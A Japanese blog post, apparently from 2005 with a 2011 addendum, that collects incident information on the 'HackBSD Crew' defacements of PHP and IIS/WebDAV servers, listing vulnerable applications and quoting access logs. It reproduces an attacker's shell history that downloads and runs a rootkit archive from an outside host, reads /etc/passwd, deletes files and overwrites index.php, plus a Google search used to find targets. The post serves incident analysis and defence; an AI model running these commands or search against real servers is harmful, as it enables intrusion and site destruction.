« 川崎:餃子みその中華料理連合会、バリスターズカフェ | トップページ | 豊洲:駅混雑とスカイツリー »

2011.07.12

『HackBSD Crew』とPHPやwebdav脆弱性と帆場暎一

(2011.7.12追記)
先日のニュースで、ソフバンの通信網がバグでなく意図的に異常動作して犯人逮捕のニュース、
すぐに発動せずに、犯人が会社を離れてからなんて、
機動警察パトレイバー劇場版1の帆場暎一を思い出したのですが、
http://temple-knights.com/archives/2011/07/softbank-network-down-Inside-job.html
やはり皆さんもそうでしたか(笑)。
しかし、プログラムの無謬性は、どのように保証担保されるのか?
複雑で高度なシステムになると、レビューや監査や検収でバグすら見逃すのに、恣意的に組み込まれ意識して隠蔽されてるウイルスなロジックを防げるだろうか。
作る奴のほうが検収する側よりプログラミング優秀だから作っているわけで。
そういうのを防ぐためにオープンソースがありますが、REDHATのように自力コンパイルが面倒でバイナリを買うような時代ですし、
膨大なLinuxの全ソースを監視できているのかな?>リーナス・トーバルズさん
OSSに対して、帆場なら元ソースにはウイルスを表示させないで、コンパイラリンカを便利に見せかけてシェアを獲得し、そこにウイルス仕込んでたりしそう。


(2005/10/17)
■Windows版HackBSDだとphpは関係無い?

2005年8月23日から数日間に国内で集中発生した「hackbsd crew」は8割方が「windows2000&IIS5」という組み合わせでした。
改竄情報サイトにもphpが動作してたとは記載がない。
そこでこのバージョンの組み合わせならば、win版hackbsd改竄はマイクロソフトのwebdavの脆弱性を突かれている可能性があります。特に2K&IIS5はやばかったですし。(2003年には既知な脆弱性だった)
win版『HackBSD Crew侵入』はこういうところを突かれたのかも。
WEBDAV自体は拡張httpなのでUNIXでも組み込まれているでしょうが、UNIXならPHP経路侵入なのでしょうか。
被害にあったところから伺った、webDAVを突いて侵入する手口は、
・侵入者のクライアントがUNIXコマンドライン型WebDAVクライアントcadaver/Neonを名乗っている
 (UAにcadaver/Neonと表示されている)
・webDAVをサーバで有効にしているぐらいの無防備IISだと、書込もeveryone属性になっているだろうから、OSの権限を乗っ取らずともリモートからIISでファイルをputしてしまうらしい。
というわけで、この場合は侵入原因としてPHPは関係ないことになります。
まぁ、まともな?クラックツールならあらゆる脆弱性を試す仕掛けになっているでしょうから、Windowsへの侵入にはwebDAVでない方法も悪用されることでしょう。
いずれにしても、新たな脆弱性を突いたわけではなく、2003年あたりから既に知られている手法で今なお侵入されている場合がほとんどのようです>サーバ書き換え事件


(2005/8/30追加)
情報元サイトのドイツ語訳をコメントにいただきました。ありがとうございます。
しかし現在も相変わらず改竄されている国内の半分はwin版ですが、こっちはどういう被害(書き換え&削除)なのでしょう。
世間的にニュースにならないからこのまま淡々と?さみだれ的に改竄され、各所で慌てて個別対処な流れなのでしょうか。


(元本文)
2005/8/23あたりに国内で多く被害が出ているので情報まとめ。
Windows系セキュリティアラートだとネットニュースや総務省から全国への注意喚起も(マイクロソフトの代理店か?と思えるくらいに)行われていますが、PHPのこうした情報はどこにアナウンスされているのだろう?
見つけきれずに自分で集めたので折角だから記録。

■トラブル事象
WEBサーバがリモートからクラックされ、html改ざんや内部ファイルの削除をされてしまう。

■トラブル詳細

日本での初出は2004年から既にあったようですが
www.zone-h.org
2005/8/23に特に多発したサーバ改ざんが『HackBSD Crew 0wnz You @ [g0d]』。
これはHackBSDとしてのcrew以外にも亜種があります。サーバの乗っ取りに成功すると、
WWWルートディレクトリ直下に「/hackbsd.html」という犯行声明を残していく。
文面は、以下のようなもの。

 HackBSD Crew 0wnz You @ [g0d]
 Whe are not Criminals, Looking for one?, Go to the white house!
 eu.undernet.org #hackbsd
 Whe are: EL_S0MBRA,dope|man,bebo,jsz,jank0,[g0d],RockyCroW

■攻撃の手口

これがなかなか情報が見つからない。
検索でもHACKBSDにクラックされたサーバを単に晒す情報しか見当たらず。
情報の元をたどって、サイトを見つけました。
どうもここが詳細に症状をレポートしてるらしいのですが、ドイツ語なので読めない…
http://haftbar.de/2005/08/11/hackbsd-crew-0wnz-y0u-jank0

■攻撃を受けるソフトウェア?
Serendipity Weblog (serendipity_xmlrpc.php)
Drupal (xmlrpc.php)
TikiWiki (xmlrpc.php)
phpMyFAQ (xmlrpcs.php)
Wordpress < 1.5
phpAdsNew
eGroupware (not yet verified)
phpGroupware (not yet verified)

■攻撃を受けたときの(関係するらしい)httpログ
230.xx - - [09/Aug/2005:19:52:41 +0200]
 "POST /xmlrpc.php HTTP/1.0" 200 524 "-" "-"
200.88.29.xx - - [10/Aug/2005:04:15:35 +0200]
 "GET /~manaus/wp-login.php HTTP/1.1" 200 1339 "http://www.google.com.do/search?q=allinurl%3A+%2Fwp-login.php+site%3Ade&hl=es" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.88.29.xx - - [10/Aug/2005:04:15:36 +0200]
 "GET /~manaus/wp-admin/wp-admin.css HTTP/1.1" 200 6074 "http://haftbar.de/~manaus/wp-login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.88.29.xx - - [10/Aug/2005:04:15:38 +0200]
 "GET /~manaus/wp-images/wp-small.png HTTP/1.1" 200 1416 "http://haftbar.de/~manaus/wp-login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.88.29.xx - - [10/Aug/2005:04:15:43 +0200]
 "GET /~manaus/xmlrpc.php HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
218.234.2.xx - - [10/Aug/2005:04:16:00 +0200]
 "POST /~manaus/xmlrpc.php HTTP/1.1" 200 139 "-" "-"
218.234.2.xx - - [10/Aug/2005:04:16:06 +0200]
 "POST /~manaus/xmlrpc.php HTTP/1.1" 200 113 "-" "-"
218.234.2.xx - - [10/Aug/2005:04:16:24 +0200]
 "POST /~manaus/xmlrpc.php HTTP/1.1" 200 76 "-" "-"

■侵入突破されたあとのtelnetログ
wget freewebs.com/REMOVED/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4;./setup 0ri0n 6000
cat /etc/passwd
passwd postgres
cd /home/manaus/public_html;ls
rm xml*
cd /var/www;ls
cd haftbar.de;ls
cd htdocs;ls
echo hackbsd Crew 0wnz y0u! @ jank0 >index.php;
rm xm*
cd /tmp;
rm *.txt killall -9 r0nin.txt

以上を自己勝手に解釈させて書かせていただきますと↓下のような流れ

■PHPが稼動しているサーバが狙われる。
国内セキュリティ監視ニュースサイト↓
JPドメインWeb改竄速報 http://izumino.jp/Security/def_jp.html
これらの改ざんでの共通点は、
Microsoft-IIS/5.0&Windows2000、または、Apache/1.3.31 PHP/4.3.8 Linux
OSよりもPHPであるかどうかが重要?

■PHPが稼動しているかのping-aliveのため「wp-login.php」を手がかりにしている
今年2005年5月の価格.comの騒動ではSQLインジェクションが話題でしたが、あの時それよりも多く被害が出ていたのはphpBBの脆弱性を突かれたサーバ改ざんでした。
その時の手口が『PHPサーバを探すためにgoogleを利用し、Powered by phpBB Version…の文字列を含むサイトを探してから攻撃に入る』というものでした。
(これは既に去年の段階で、Googleを利用し.ASP .JSP .PHP .PHTM .SHTMあたりを探し回る手口のワームがあったようです)
これと同じように、今回は、
http://www.google.co.jp/search?complete=1&hl=ja&c2coff=1&q=allinurl%3A%2Fwp-login.php+site%3Ajp&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
このように「allinurl:/wp-login.php site:jp」で目星をつけていたようです。

■httpポート経由でPOSTやGETをPHPに仕掛けてクラックする?
サーバを見つけるとPHPへリクエスト攻撃するわけですが、
なぜここでOSの管理者権限が乗っ取られるかが不明です。
HackBSDを名乗る手口自体は2004.12時点で既出ですが、今回が同じ痕跡名でも侵入手法が同一かは断言できません。
単に未パッチ放置だったサイトばかりであれば手法は古典的なままなのかもしれませんし、乗っ取り部分だけ新型なのかもしれませんし。

■乗っ取られたあとは…いろいろやられ放題?
もっとひどい悪さをできそうですが『HackBSD Crew』では犯行声明ページで
『Whe are not Criminals』と主張してます。が、
それと並行して、UNIX系の場合は、
一部のファイルのremove、passwdファイルの書き換え、freewebs.com/REMOVED/shv4.tar.gzをダウンロードしてそれのsetupをやってるようです。
(shv4.tar.gzはかなり古いexploitsのアーカイブでアングラにごろごろあるクラックツール)
あとwin2k+IISの環境でも侵入されています。こっちもコマンドラインとかバッチで自動的にサーバ内を好き勝手しているのでしょうが、UNIXのhisのようにコマンド履歴が残っているかどうかが怪しい(IISでやられた事例ログを収集中ですが見当たらず)。それに痕跡をも削除するマクロなのがデフォでしょうし。
そのため手掛かりが少なく手口解明がより難しいかもしれません>win版PHPの場合。
shv4.tar.gzがwinでは動きませんから別の何かを仕掛ける手口かもしれませんし。

■echoでhackbsd声明文ファイルをサイトに蔵置する
「ファイルの蔵置」は公用な表現ですが、これによりやられたことが判るわけです。
改竄サイトを検出している所はよくまぁ見つけますね??

■ドイツのそのレポサイトによればバックドアも仕掛ける?
「telnet backdoor port 1666」ともあります。

今回の攻撃も既知の脆弱性を相変わらず突いたものであるならば、
ネットには無防備&放置なサーバがまだまだ多いということでしょうか。
先のgoogle検索では300件ぐらいヒットしますので、まだまだ攻撃は続くかも?
(2011年に検索してもまだヒットする...この中に相変わらず無防備な作りのがあるのか)
とりあえず過去(2004年)の乗っ取り手法を調べたのですが、検索してみて日経BPに技術的な手口解説の記事がありました。
(引用元は英語ばかりで国内から発信されてないようです)
この時のPhpInclude.Worm(Santy.e)というワームはPHPの関数「Include()」や「Require()」を不適切に使うことで発生する「File Inclusion Flaw」現象を悪用する。よってセキュリティホールというよりSQLインジェクションのようにプログラム設定ミスを突いたものでした。よって広範囲のPHPが該当したそうです。
PHPを狙うワームが出現,Webページのプログラム・ミスを突く 2004.12
記事にあるようにすぐ亜種が出現し、セキュリティホールも攻撃する複合タイプも出現しているため、最新のセキュアな状態に維持し続けることが肝要と思われます。

アドバイザリで2004年12月のPHP脆弱性解説を見つけましたが、英文です。
http://secunia.com/advisories/13481/
その後はPHPに関しては2005年4月にDoSを受ける脆弱性が報告されてますが、
現在は特に何もアドバイザリは出ていません。>PHP
となると、一番のhackBSDの原因は新手の攻撃でなく、この2004年12月の脆弱性が残っているに過ぎない?

|

« 川崎:餃子みその中華料理連合会、バリスターズカフェ | トップページ | 豊洲:駅混雑とスカイツリー »

パソコン・インターネット」カテゴリの記事

コメント

おお(^^;
お恥ずかしい。お手数おかけしました。
ありがとうございます。

投稿: NTD | 2005.08.30 10:20

http://haftbar.de/2005/08/11/hackbsd-crew-0wnz-y0u-jank0

このサイトはデンマーク語でなくドイツ語だと思います. デンマークは.dkです.

ドイツ語は全く知らないのですが, Googleの独英訳ができました. 拙いものですが, それを和訳したものを次のところにおきました.

http://land.to/supportbb/viewtopic.php?t=824

もしよろしければご利用ください.

投稿: svl | 2005.08.30 10:11

この記事へのコメントは終了しました。

トラックバック

この記事のトラックバックURL:
http://app.cocolog-nifty.com/t/trackback/3180/5605571

この記事へのトラックバック一覧です: 『HackBSD Crew』とPHPやwebdav脆弱性と帆場暎一:

» xoops/wordpress/phpにご用心 [フランス未来エンタメ研究所]
hackbsdというハッキング被害が広がっているらしい。 xoopsMLで被害にあったという話がちらほら見受けられる。 対処情報などはこちらにまとまっています。 http://ntd.way-nifty.com/blog/2005/08/hackbsd_crewphp_b0e2.html ここをみると、IAMASとかも同じhackbsd被害にあ... [続きを読む]

受信: 2005.08.28 01:42

« 川崎:餃子みその中華料理連合会、バリスターズカフェ | トップページ | 豊洲:駅混雑とスカイツリー »